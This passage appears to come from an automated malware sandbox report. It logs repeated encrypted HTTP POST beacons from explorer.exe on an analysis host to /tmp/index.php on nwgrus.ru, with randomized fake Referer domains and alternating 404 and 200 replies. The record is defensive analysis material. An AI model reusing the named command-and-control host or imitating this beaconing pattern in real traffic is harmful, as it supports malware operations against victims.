[TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.449749190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:53.499587059 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://mgjceopkpxepxsq.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 213
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:53.499623060 CEST213OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5a 38 c3 91
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuZ8ZPMo{Kr@Ng8z@#ahwUS(f[D&]6HW:/t(mx8QOAL.m
                                                                Oct 12, 2024 23:27:54.871311903 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.449750190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:54.879584074 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://oftgcfgbliielxad.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 313
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:54.879584074 CEST313OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4d 49 ff 8c
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuMI,URwz`3'j%Ms#/u)#m]4^%+hTDNW0`t:p:M"<g,*W3GAX.>s
                                                                Oct 12, 2024 23:27:56.259181023 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:55 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.449751190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:56.555217981 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://drvjksfgomsvmny.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 269
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:56.555231094 CEST269OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5f 5d a7 95
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu_]`B`?WN&J{rt]UTD^+1n,@7|Q9AyA@-;K_zr@.$\+"5EPZRl6RCk
                                                                Oct 12, 2024 23:27:57.930603027 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:57 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.449752190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:57.939685106 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ecoqiraysyfcwnbl.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 344
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:57.939718008 CEST344OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 17 d2 8a
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuM@zhI;R,qFhO}-mM*P2~B _|]1i0/8aW,&J#`#f*y_Y`An:46
                                                                Oct 12, 2024 23:27:59.333549976 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:59 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.449753190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:59.394874096 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://evxjlpqlxbs.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 248
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:59.394901991 CEST248OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 76 5d c9 e5
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuv]hKoh7Y)>ZWZV;5U:!IAcrZU~{JGr/[w/`(Vp1&zPD/k2E+
                                                                Oct 12, 2024 23:28:00.782381058 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:00 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.449760190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:00.791733980 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://icaimrqjtfta.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 304
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:00.791764021 CEST304OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2a 1f cf a3
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu*wc%1tU(;4?1mi}KE@A-ROxP%LJT1\./+<KS:dcf#y8]DB
                                                                Oct 12, 2024 23:28:02.175883055 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:01 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.449772190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:02.185267925 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ulydvxuenfbpuxu.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 234
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:02.185295105 CEST234OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 54 4a c1 86
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuTJ3sDhi[/9 (af&r.V`]0M7}c^X,=4hDk5%6C5'v!Exum'0
                                                                Oct 12, 2024 23:28:03.567646027 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:03 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.449778190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:03.579154968 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://gvahueqnuehjgw.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 117
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:03.579154968 CEST117OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 52 1e e7 fa
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuRN?f=2f )vq
                                                                Oct 12, 2024 23:28:04.963047028 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:04 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.449789190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:04.973149061 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://tfjoxhiuawit.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 311
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:04.973164082 CEST311OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 41 41 f9 a7
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuAA)Rg!pLv,Pe*7SP;;tE[P1],Y1Y!mGZ=,lAR.T;(xUl(;xx{J-o
                                                                Oct 12, 2024 23:28:06.354466915 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:06 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.449800190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:06.390017986 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://fveqebbshittyfl.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 262
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:06.390919924 CEST262OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 40 30 c6 ec
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu@0yEMxyq6,|y*AC,1o;.:A/~l=92\$m@}_-TX5K?o"m$RGD"'+u3;_
                                                                Oct 12, 2024 23:28:07.766947985 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:07 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.449811190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:07.774807930 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ymhiquwyrvgqovol.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 313
                                                                Host: nwgrus.ru
